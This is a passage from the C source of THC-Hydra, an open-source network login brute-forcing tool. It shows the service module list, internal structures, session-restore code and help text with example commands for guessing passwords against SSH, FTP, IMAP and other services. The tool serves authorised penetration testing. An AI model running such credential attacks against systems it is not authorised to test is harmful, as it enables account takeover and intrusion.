service_sshkey_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBSVN\nextern void service_svn(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_svn_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBORACLE\nextern void service_oracle(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_oracle_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef HAVE_GCRYPT\nextern void service_radmin2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_radmin2_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#ifdef LIBMCACHED\nextern void service_mcached(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_mcached_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n#if defined(LIBMONGODB2) || defined(LIBMONGODB)\nextern void service_mongodb(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_mongodb_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n#endif\n\nextern int32_t service_adam6500_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_cisco_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_cisco_enable_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_cvs_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_smtp_enum_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_http_form_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_ftp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_http_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_icq_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_imap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_irc_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_ldap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_mssql_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_cobaltstrike_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_nntp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_pcanywhere_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_pcnfs_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_pop3_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_http_proxy_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_asterisk_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_redis_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rexec_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rlogin_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rsh_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_smtp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_snmp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_socks5_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_teamspeak_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_telnet_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_http_proxy_urlenum_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_vmauthd_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_vnc_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_xmpp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_s7_300_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rtsp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\nextern int32_t service_rpcap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n\n// ADD NEW SERVICES HERE\nchar *SERVICES = \"adam6500 asterisk afp cisco cisco-enable cobaltstrike cvs firebird ftp[s] \"\n \"http[s]-{head|get|post} http[s]-{get|post}-form http-proxy \"\n \"http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] \"\n \"memcached mongodb mssql mysql ncp nntp oracle oracle-listener oracle-sid \"\n \"pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap \"\n \"rsh rtsp s7-300 sapr3 sip smb smb2 smtp[s] smtp-enum snmp socks5 ssh \"\n \"sshkey svn teamspeak telnet[s] vmauthd vnc xmpp\";\n\n#define MAXBUF 520\n#define MAXLINESIZE ((MAXBUF / 2) - 4)\n#define MAXTASKS 64\n#define MAXSERVERS 16\n#define MAXFAIL 3\n#define MAXENDWAIT 20\n#define WAITTIME 32\n#define TASKS 16\n#define SKIPLOGIN 256\n#define USLEEP_LOOP 10\n#define MAX_LINES 50000000 // 50 millions, do not put more than 65millions\n#define MAX_BYTES 500000000 // 500 millions, do not put more than 650millions\n\n#define RESTOREFILE \"./hydra.restore\"\n\n#define PROGRAM \"Hydra\"\n#define VERSION \"v9.7dev\"\n#define AUTHOR \"van Hauser/THC\"\n#define EMAIL \"\"\n#define AUTHOR2 \"David Maciejak\"\n#define EMAIL2 \"\"\n#define RESOURCE \"https://github.com/vanhauser-thc/thc-hydra\"\n\nextern char *hydra_strcasestr(const char *haystack, const char *needle);\nextern void hydra_tobase64(unsigned char *buf, int32_t buflen, int32_t bufsize);\nextern char *hydra_string_replace(const char *string, const char *substr, const char *replacement);\nextern char *hydra_address2string(char *address);\nextern char *hydra_address2string_beautiful(char *address);\nextern uint32_t colored_output;\nextern char quiet;\nextern int32_t do_retry;\nextern int32_t old_ssl;\n\nvoid hydra_kill_head(int32_t head_no, int32_t killit, int32_t fail);\n\n// some enum definitions\ntypedef enum { HEAD_DISABLED = -1, HEAD_UNUSED = 0, HEAD_ACTIVE = 1 } head_state_t;\n\ntypedef enum { TARGET_ACTIVE = 0, TARGET_FINISHED = 1, TARGET_ERROR = 2, TARGET_UNRESOLVED = 3 } target_state_t;\n\n// some structure definitions\ntypedef struct {\n pid_t pid;\n int32_t sp[2];\n int32_t target_no;\n char *current_login_ptr;\n char *current_pass_ptr;\n char reverse[256];\n head_state_t active;\n int32_t redo;\n time_t last_seen;\n} hydra_head;\n\ntypedef struct {\n char *target;\n char *miscptr;\n char ip[36];\n char *login_ptr;\n char *pass_ptr;\n uint64_t login_no;\n uint64_t pass_no;\n uint64_t sent;\n int32_t pass_state;\n int32_t use_count;\n target_state_t done;\n int32_t fail_count;\n int32_t redo_state;\n int32_t redo;\n int32_t ok;\n int32_t failed;\n int32_t skipcnt;\n int32_t port;\n char *redo_login[MAXTASKS * 2 + 2];\n char *redo_pass[MAXTASKS * 2 + 2];\n char *skiplogin[SKIPLOGIN];\n // char *bfg_ptr[MAXTASKS];\n} hydra_target;\n\ntypedef struct {\n int32_t active; // active tasks of hydra_options.max_use\n int32_t targets;\n int32_t finished;\n int32_t exit;\n uint64_t todo_all;\n uint64_t todo;\n uint64_t sent;\n uint64_t found;\n uint64_t countlogin;\n uint64_t countpass;\n size_t sizelogin;\n size_t sizepass;\n FILE *ofp;\n} hydra_brain;\n\ntypedef struct {\n char *name;\n int32_t port;\n int32_t port_ssl;\n} hydra_portlist;\n\n// external vars\nextern char *HYDRA_EXIT;\n#if !defined(ANDROID) && !defined(__BIONIC__)\nextern int32_t errno;\n#endif\nextern int32_t debug;\nextern int32_t verbose;\nextern int32_t waittime;\nextern int32_t port;\nextern int32_t found;\nextern int32_t use_proxy;\nextern int32_t proxy_count;\nextern int32_t selected_proxy;\nextern int32_t proxy_string_port[MAX_PROXY_COUNT];\nextern char proxy_string_ip[MAX_PROXY_COUNT][36];\nextern char proxy_string_type[MAX_PROXY_COUNT][10];\nextern char *proxy_authentication[MAX_PROXY_COUNT];\nextern char *cmdlinetarget;\nextern char *fe80;\n\n// required global vars\nchar *prg;\nsize_t size_of_data = -1;\nhydra_head **hydra_heads = NULL;\nhydra_target **hydra_targets = NULL;\nhydra_option hydra_options;\nhydra_brain hydra_brains;\nchar *sck = NULL;\nint32_t prefer_ipv6 = 0, conwait = 0, loop_cnt = 0, fck = 0, options = 0, killed = 0;\nint32_t child_head_no = -1, child_socket;\nint32_t total_redo_count = 0;\n\n// requred for distributed attack capability\nuint32_t num_segments = 0;\nuint32_t my_segment = 0;\nchar junk_file[50];\n\n// moved for restore feature\nint32_t process_restore = 0, dont_unlink;\nchar *login_ptr = NULL, *pass_ptr = \"\", *csv_ptr = NULL, *servers_ptr = NULL;\nsize_t countservers = 1, sizeservers = 0;\nchar empty_login[2] = \"\", unsupported[500] = \"\";\n\n// required to save stack memory\nchar snpbuf[MAXBUF];\nint32_t snpdone, snp_is_redo, snpbuflen, snpi, snpj, snpdont;\n\n#include \"performance.h\"\n\ntypedef void (*service_t)(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\ntypedef int32_t (*service_init_t)(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\ntypedef void (*service_usage_t)(const char *service);\n\n#define SERVICE2(name, func) {name, service_##func##_init, service_##func, NULL}\n#define SERVICE(name) {#name, service_##name##_init, service_##name, NULL}\n#define SERVICE3(name, func) {name, service_##func##_init, service_##func, usage_##func}\n\nstatic const struct {\n const char *name;\n service_init_t init;\n service_t exec;\n service_usage_t usage;\n} services[] = {SERVICE(adam6500),\n#ifdef LIBAFP\n SERVICE(afp),\n#endif\n SERVICE(asterisk),\n SERVICE3(\"cisco\", cisco),\n SERVICE3(\"cisco-enable\", cisco_enable),\n SERVICE3(\"cvs\", cvs),\n#ifdef LIBFIREBIRD\n SERVICE3(\"firebird\", firebird),\n#endif\n SERVICE(ftp),\n {\"ftps\", service_ftp_init, service_ftps, NULL},\n {\"http-get\", service_http_init, service_http_get, usage_http},\n {\"http-get-form\", service_http_form_init, service_http_get_form, usage_http_form},\n {\"http-head\", service_http_init, service_http_head, NULL},\n {\"http-form\", service_http_form_init, NULL, usage_http_form},\n {\"http-post\", service_http_init, service_http_post, usage_http},\n {\"http-post-form\", service_http_form_init, service_http_post_form, usage_http_form},\n SERVICE3(\"http-proxy\", http_proxy),\n SERVICE3(\"http-proxy-urlenum\", http_proxy_urlenum),\n SERVICE(icq),\n SERVICE3(\"imap\", imap),\n SERVICE3(\"irc\", irc),\n {\"ldap\", service_ldap_init, service_ldap2, usage_ldap},\n {\"ldap2\", service_ldap_init, service_ldap2, usage_ldap},\n {\"ldap3\", service_ldap_init, service_ldap3, usage_ldap},\n {\"ldap3-crammd5\", service_ldap_init, service_ldap3_cram_md5, usage_ldap},\n {\"ldap3-digestmd5\", service_ldap_init, service_ldap3_digest_md5, usage_ldap},\n#ifdef LIBMCACHED\n {\"memcached\", service_mcached_init, service_mcached, NULL},\n#endif\n SERVICE(mssql),\n SERVICE(cobaltstrike),\n#if defined(LIBMONGODB2) || defined(LIBMONGODB)\n SERVICE3(\"mongodb\", mongodb),\n#endif\n#ifdef HAVE_MATH_H\n SERVICE3(\"mysql\", mysql),\n#endif\n#ifdef LIBNCP\n SERVICE3(\"ncp\", ncp),\n#endif\n SERVICE3(\"nntp\", nntp),\n#ifdef LIBORACLE\n SERVICE3(\"oracle\", oracle),\n#endif\n#ifdef LIBOPENSSL\n SERVICE3(\"oracle-listener\", oracle_listener),\n SERVICE2(\"oracle-sid\", oracle_sid),\n#endif\n SERVICE(pcanywhere),\n SERVICE(pcnfs),\n SERVICE3(\"pop3\", pop3),\n#ifdef LIBPOSTGRES\n SERVICE3(\"postgres\", postgres),\n#endif\n SERVICE(redis),\n SERVICE(rexec),\n#ifdef LIBFREERDP\n SERVICE3(\"rdp\", rdp),\n#endif\n SERVICE(rlogin),\n SERVICE(rsh),\n SERVICE(rtsp),\n SERVICE(rpcap),\n SERVICE3(\"s7-300\", s7_300),\n#ifdef LIBSAPR3\n SERVICE3(\"sarp3\", sapr3),\n#endif\n#ifdef LIBOPENSSL\n SERVICE(sip),\n SERVICE3(\"smbnt\", smb),\n SERVICE3(\"smb\", smb),\n#endif\n#if defined(LIBSMBCLIENT)\n SERVICE3(\"smb2\", smb2),\n#endif\n SERVICE3(\"smtp\", smtp),\n SERVICE3(\"smtp-enum\", smtp_enum),\n SERVICE3(\"snmp\", snmp),\n SERVICE(socks5),\n#ifdef LIBSSH\n {\"ssh\", NULL, service_ssh, NULL},\n SERVICE3(\"sshkey\", sshkey),\n#endif\n#ifdef LIBSVN\n SERVICE3(\"svn\", svn),\n#endif\n SERVICE(teamspeak),\n SERVICE3(\"telnet\", telnet),\n SERVICE(vmauthd),\n SERVICE(vnc),\n#ifdef HAVE_GCRYPT\n SERVICE(radmin2),\n#endif\n {\"xmpp\", service_xmpp_init, NULL, usage_xmpp}};\n\n#define PRINT_NORMAL(ext, text, ...) printf(text, ##__VA_ARGS__)\n#define PRINT_EXTEND(ext, text, ...) \\\n do { \\\n if (ext) \\\n printf(text, ##__VA_ARGS__); \\\n } while (0)\n\nint32_t /*inline*/\ncheck_flag(int32_t value, int32_t flag) { // inline does not compile with debug\n return (value & flag) == flag;\n}\n\nvoid help(int32_t ext) {\n PRINT_NORMAL(ext, \"Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | \"\n \"[-C FILE]] [-e nsr]\"\n \" [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W \"\n \"TIME] [-f] [-s PORT]\"\n#ifdef HAVE_MATH_H\n \" [-x MIN:MAX:CHARSET]\"\n#endif\n \" [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] \"\n //\"[server service [OPT]]|\"\n \"[service://server[:PORT][/OPT]]\\n\");\n PRINT_NORMAL(ext, \"\\nOptions:\\n\");\n PRINT_EXTEND(ext, \" -R restore a previous aborted/crashed session\\n\"\n \" -I ignore an existing restore file (don't wait 10 seconds)\\n\"\n#ifdef LIBOPENSSL\n \" -S perform an SSL connect\\n\"\n#endif\n \" -s PORT if the service is on a different default port, define it \"\n \"here\\n\");\n PRINT_NORMAL(ext, \" -l LOGIN or -L FILE login with LOGIN name, or load \"\n \"several logins from FILE\\n\"\n \" -p PASS or -P FILE try password PASS, or load several \"\n \"passwords from FILE\\n\");\n PRINT_EXTEND(ext,\n#ifdef HAVE_MATH_H\n \" -x MIN:MAX:CHARSET password bruteforce generation, type \"\n \"\\\"-x -h\\\" to get help\\n\"\n \" -y disable use of symbols in bruteforce, see above\\n\"\n \" -r use a non-random shuffling method for option -x\\n\"\n#endif\n \" -e nsr try \\\"n\\\" null password, \\\"s\\\" login as pass \"\n \"and/or \\\"r\\\" reversed login\\n\"\n \" -u loop around users, not passwords (effective! \"\n \"implied with -x)\\n\");\n PRINT_NORMAL(ext, \" -C FILE colon separated \\\"login:pass\\\" format, \"\n \"instead of -L/-P options\\n\"\n \" -M FILE list of servers to attack, one entry per \"\n \"line, ':' to specify port\\n\");\n PRINT_NORMAL(ext, \" -D XofY Divide wordlist into Y segments and use the \"\n \"Xth segment.\\n\");\n PRINT_EXTEND(ext, \" -o FILE write found login/password pairs to FILE instead of stdout\\n\"\n \" -b FORMAT specify the format for the -o FILE: text(default), json, \"\n \"jsonv1\\n\"\n \" -f / -F exit when a login/pass pair is found (-M: -f per host, -F \"\n \"global)\\n\");\n PRINT_NORMAL(ext,\n \" -t TASKS run TASKS number of connects in parallel per \"\n \"target (default: %d)\\n\",\n TASKS);\n PRINT_EXTEND(ext,\n \" -T TASKS run TASKS connects in parallel overall (for -M, default: \"\n \"%d)\\n\"\n \" -w / -W TIME wait time for a response (%d) / between connects per \"\n \"thread (%d)\\n\"\n#ifdef MSG_PEEK\n \" -c TIME wait time per login attempt over all threads (enforces -t \"\n \"1)\\n\"\n#endif\n \" -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also \"\n \"in -M)\\n\"\n \" -v / -V / -d verbose mode / show login+pass for each attempt / debug \"\n \"mode \\n\"\n \" -O use old SSL v2 and v3\\n\"\n \" -K do not redo failed attempts (good for -M mass scanning)\\n\"\n \" -q do not print messages about connection errors\\n\",\n MAXTASKS, WAITTIME, conwait);\n PRINT_NORMAL(ext, \" -U service module usage details\\n\"\n \" -m OPT options specific for a module, see -U output for \"\n \"information\\n\"\n \" -h more command line options (COMPLETE HELP)\\n\"\n \" server the target: DNS, IP or 192.168.0.0/24 (this OR the -M \"\n \"option)\\n\"\n \" service the service to crack (see below for supported protocols)\\n\"\n \" OPT some service modules support additional input (-U for \"\n \"module help)\\n\");\n PRINT_NORMAL(ext,\n \"\\nSupported services: %s\\n\"\n \"\\n%s is a tool to guess/crack valid login/password pairs.\\n\"\n \"Licensed under AGPL v3.0. The newest version is always available at;\\n%s\\n\"\n \"Please don't use in military or secret service organizations, or for illegal\\n\"\n \"purposes. (This is a wish and non-binding - most such people do not care about\\n\"\n \"laws and ethics anyway - and tell themselves they are one of the good ones.)\\n\",\n SERVICES, PROGRAM, RESOURCE);\n\n if (ext && strlen(unsupported) > 0) {\n if (unsupported[strlen(unsupported) - 1] == ' ')\n unsupported[strlen(unsupported) - 1] = 0;\n printf(\"These services were not compiled in: %s.\\n\", unsupported);\n }\n PRINT_EXTEND(ext, \"\\nUse HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy \"\n \"setup.\\n\"\n \"E.g. %% export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// \"\n \"connect://)\\n\"\n \" %% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 \"\n \"entries)\\n\"\n \" %% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080\\n\"\n \" %% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)\\n\");\n PRINT_NORMAL(ext, \"\\nExample%s:%s hydra -l user -P passlist.txt ftp://192.168.0.1\\n\", ext == 0 ? \"\" : \"s\", ext == 0 ? \"\" : \"\\n\");\n PRINT_EXTEND(ext, \" hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN\\n\"\n \" hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5\\n\"\n \" hydra -l admin -p password ftp://[192.168.0.0/24]/\\n\"\n \" hydra -L logins.txt -P pws.txt -M targets.txt ssh\\n\");\n exit(-1);\n}\n\nvoid help_bfg() {\n printf(\"Hydra bruteforce password generation option usage:\\n\\n\"\n \" -x MIN:MAX:CHARSET\\n\\n\"\n \" MIN is the minimum number of characters in the password\\n\"\n \" MAX is the maximum number of characters in the password\\n\"\n \" CHARSET is a specification of the characters to use in the \"\n \"generation\\n\"\n \" valid CHARSET values are: 'a' for lowercase letters,\\n\"\n \" 'A' for uppercase letters, '1' for numbers, and for all \"\n \"others,\\n\"\n \" just add their real representation.\\n\"\n \" -y disable the use of the above letters as placeholders\\n\"\n \"Examples:\\n\"\n \" -x 3:5:a generate passwords from length 3 to 5 with all \"\n \"lowercase letters\\n\"\n \" -x 5:8:A1 generate passwords from length 5 to 8 with uppercase \"\n \"and numbers\\n\"\n \" -x 1:3:/ generate passwords from length 1 to 3 containing only \"\n \"slashes\\n\"\n \" -x 5:5:/%%,.- generate passwords with length 5 which consists \"\n \"only of /%%,.-\\n\"\n \" -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and \"\n \"1 only\\n\"\n \"\\nThe bruteforce mode was made by Jan Dlabal, \"\n \"http://houbysoft.com/bfg/\\n\");\n exit(-1);\n}\n\nvoid module_usage() {\n int32_t i;\n\n printf(\"\\nHelp for module \"\n \"%s:\\n================================================================\"\n \"============\\n\",\n hydra_options.service);\n if (strncmp(hydra_options.service, \"https-\", 6) == 0)\n memmove(hydra_options.service + 4, hydra_options.service + 5, strlen(hydra_options.service) - 4);\n for (i = 0; i < sizeof(services) / sizeof(services[0]); i++) {\n if (strcmp(hydra_options.service, services[i].name) == 0) {\n if (services[i].usage) {\n services[i].usage(hydra_options.service);\n exit(0);\n }\n }\n }\n\n printf(\"The Module %s does not need or support optional parameters\\n\", hydra_options.service);\n exit(0);\n}\n\n#define STR_NULL(s) ((s) == NULL ? \"(null)\" : (s))\n\nvoid hydra_debug(int32_t force, char *string) {\n int32_t active = 0, inactive = 0, i;\n\n if (!debug && !force)\n return;\n\n printf(\"[DEBUG] Code: %s Time: %\" hPRIu64 \"\\n\", string, (uint64_t)time(NULL));\n printf(\"[DEBUG] Options: mode %d ssl %d restore %d showAttempt %d tasks \"\n \"%d max_use %d tnp %d tpsal %d tprl %d exit_found %d miscptr %s \"\n \"service %s\\n\",\n hydra_options.mode, hydra_options.ssl, hydra_options.restore, hydra_options.showAttempt, hydra_options.tasks, hydra_options.max_use, hydra_options.try_null_password, hydra_options.try_password_same_as_login, hydra_options.try_password_reverse_login, hydra_options.exit_found, STR_NULL(hydra_options.miscptr), hydra_options.service);\n\n printf(\"[DEBUG] Brains: active %d targets %d finished %d todo_all %\" hPRIu64 \" todo %\" hPRIu64 \" sent %\" hPRIu64 \" found %\" hPRIu64 \" countlogin %\" hPRIu64 \" sizelogin %\" hPRIu64 \" countpass %\" hPRIu64 \" sizepass %\" hPRIu64 \"\\n\", hydra_brains.active, hydra_brains.targets, hydra_brains.finished, hydra_brains.todo_all + total_redo_count, hydra_brains.todo, hydra_brains.sent, hydra_brains.found, (uint64_t)hydra_brains.countlogin, (uint64_t)hydra_brains.sizelogin, (uint64_t)hydra_brains.countpass,\n (uint64_t)hydra_brains.sizepass);\n\n for (i = 0; i < hydra_brains.targets; i++) {\n hydra_target *target = hydra_targets[i];\n printf(\"[DEBUG] Target %d - target %s ip %s login_no %\" hPRIu64 \" pass_no %\" hPRIu64 \" sent %\" hPRIu64 \" pass_state %d redo_state %d (%d redos) use_count %d failed %d \"\n \" done %d fail_count %d login_ptr %s pass_ptr %s\\n\",\n i, STR_NULL(target->target), hydra_address2string_beautiful(target->ip), target->login_no, target->pass_no, target->sent, target->pass_state, target->redo_state, target->redo, target->use_count, target->failed, target->done, target->fail_count, STR_NULL(target->login_ptr), STR_NULL(target->pass_ptr));\n }\n\n if (hydra_heads == NULL)\n return;\n\n for (i = 0; i < hydra_options.max_use; i++) {\n if (hydra_heads[i]->active >= HEAD_UNUSED) {\n printf(\"[DEBUG] Task %d - pid %d active %d redo %d current_login_ptr \"\n \"%s current_pass_ptr %s\\n\",\n i, (int32_t)hydra_heads[i]->pid, hydra_heads[i]->active, hydra_heads[i]->redo, STR_NULL(hydra_heads[i]->current_login_ptr), STR_NULL(hydra_heads[i]->current_pass_ptr));\n if (hydra_heads[i]->active == HEAD_UNUSED)\n inactive++;\n else\n active++;\n }\n }\n printf(\"[DEBUG] Tasks %d inactive %d active\\n\", inactive, active);\n}\n\nvoid bail(char *text) {\n fprintf(stderr, \"[ERROR] %s\\n\", text);\n exit(-1);\n}\n\nvoid hydra_restore_write(int32_t print_msg) {\n FILE *f;\n hydra_brain brain;\n char mynull[4] = {0, 0, 0, 0}, buf[4];\n int32_t i = 0, j = 0;\n hydra_head hh;\n\n if (process_restore != 1)\n return;\n\n for (i = 0; i < hydra_brains.targets; i++)\n if (hydra_targets[j]->done != TARGET_FINISHED && hydra_targets[j]->done != TARGET_UNRESOLVED)\n j++;\n if (j == 0) {\n process_restore = 0;\n return;\n }\n\n if ((f = fopen(RESTOREFILE, \"w\")) == NULL) {\n fprintf(stderr, \"[ERROR] Can not create restore file (%s) - \", RESTOREFILE);\n perror(\"\");\n process_restore = 0;\n return;\n } else if (debug)\n printf(\"[DEBUG] Writing restore file... \");\n\n fprintf(f, \"%s\\n\", PROGRAM);\n buf[0] = VERSION[1];\n buf[1] = VERSION[3];\n buf[2] = sizeof(int32_t) % 256;\n buf[3] = sizeof(hydra_target *) % 256;\n fwrite(buf, 1, 4, f);\n memcpy(&brain, &hydra_brains, sizeof(hydra_brain));\n brain.targets = i;\n brain.ofp = NULL;\n brain.finished = brain.active = 0;\n fck = fwrite(&bf_options, sizeof(bf_options), 1, f);\n if (bf_options.crs != NULL)\n fck = fwrite(bf_options.crs, BF_CHARSMAX, 1, f);\n else\n fck = fwrite(mynull, sizeof(mynull), 1, f);\n fck = fwrite(&brain, sizeof(hydra_brain), 1, f);\n fck = fwrite(&hydra_options, sizeof(hydra_option), 1, f);\n fprintf(f, \"%s\\n\", hydra_options.server == NULL ? \"\" : hydra_options.server);\n if (hydra_options.outfile_ptr == NULL)\n fprintf(f, \"\\n\");\n else\n fprintf(f, \"%s\\n\", hydra_options.outfile_ptr);\n fprintf(f, \"%s\\n%s\\n\", hydra_options.miscptr == NULL ? \"\" : hydra_options.miscptr, hydra_options.service);\n fck = fwrite(login_ptr, hydra_brains.sizelogin + hydra_brains.countlogin + 8, 1, f);\n if (hydra_options.colonfile == NULL || hydra_options.colonfile == empty_login)\n fck = fwrite(pass_ptr, hydra_brains.sizepass + hydra_brains.countpass + 8, 1, f);\n for (j = 0; j < hydra_brains.targets; j++)\n if (hydra_targets[j]->done != TARGET_FINISHED) {\n fck = fwrite(hydra_targets[j], sizeof(hydra_target), 1, f);\n fprintf(f, \"%s\\n%d\\n%d\\n\", hydra_targets[j]->target == NULL ? \"\" : hydra_targets[j]->target, (int32_t)(hydra_targets[j]->login_ptr - login_ptr), (int32_t)(hydra_targets[j]->pass_ptr - pass_ptr));\n fprintf(f, \"%s\\n%s\\n\", hydra_targets[j]->login_ptr, hydra_targets[j]->pass_ptr);\n if (hydra_targets[j]->redo)\n for (i = 0; i < hydra_targets[j]->redo; i++)\n fprintf(f, \"%s\\n%s\\n\", hydra_targets[j]->redo_login[i], hydra_targets[j]->redo_pass[i]);\n if (hydra_targets[j]->skipcnt)\n for (i = 0; i < hydra_targets[j]->skipcnt; i++)\n fprintf(f, \"%s\\n\", hydra_targets[j]->skiplogin[i]);\n }\n for (j = 0; j < hydra_options.max_use; j++) {\n memcpy((char *)&hh, hydra_heads[j], sizeof(hydra_head));\n if (j == 0 && debug) {\n printf(\"[DEBUG] sizeof hydra_head: %lu\\n\", sizeof(hydra_head));\n printf(\"[DEBUG] memcmp: %d\\n\", memcmp(hydra_heads[j], &hh, sizeof(hydra_head)));\n }\n hh.active = 0; // re-enable disabled heads\n if ((hh.current_login_ptr != NULL && hh.current_login_ptr != empty_login) || (hh.current_pass_ptr != NULL && hh.current_pass_ptr != empty_login)) {\n hh.redo = 1;\n if (print_msg && debug)\n printf(\"[DEBUG] we will redo the following combination: target %s \"\n \"child %d login \\\"%s\\\" pass \\\"%s\\\"\\n\",\n hydra_targets[hh.target_no]->target, j, hh.current_login_ptr, hh.current_pass_ptr);\n }\n fck = fwrite((char *)&hh, sizeof(hydra_head), 1, f);\n if (hh.redo /* && (hydra_options.bfg == 0 || (hh.current_pass_ptr == hydra_targets[hh.target_no]->bfg_ptr[j] && isprint((char) hh.current_pass_ptr[0]))) */)\n fprintf(f, \"%s\\n%s\\n\", hh.current_login_ptr == NULL ? \"\" : hh.current_login_ptr, hh.current_pass_ptr == NULL ? \"\" : hh.current_pass_ptr);\n else\n fprintf(f, \"\\n\\n\");\n }\n\n fprintf(f, \"%s\\n\", PROGRAM);\n fclose(f);\n if (debug)\n printf(\"[DEBUG] done writing session file\\n\");\n if (print_msg)\n printf(\"The session file ./hydra.restore was written. Type \\\"hydra -R\\\" to \"\n \"resume session.\\n\");\n hydra_debug(0, \"hydra_restore_write()\");\n}\n\nvoid hydra_restore_read() {\n FILE *f;\n char mynull[4], buf[4];\n int32_t i, j, orig_debug = debug;\n char out[1024];\n\n printf(\"[INFORMATION] reading restore file %s\\n\", RESTOREFILE);\n if ((f = fopen(RESTOREFILE, \"r\")) == NULL) {\n fprintf(stderr, \"[ERROR] restore file (%s) not found - 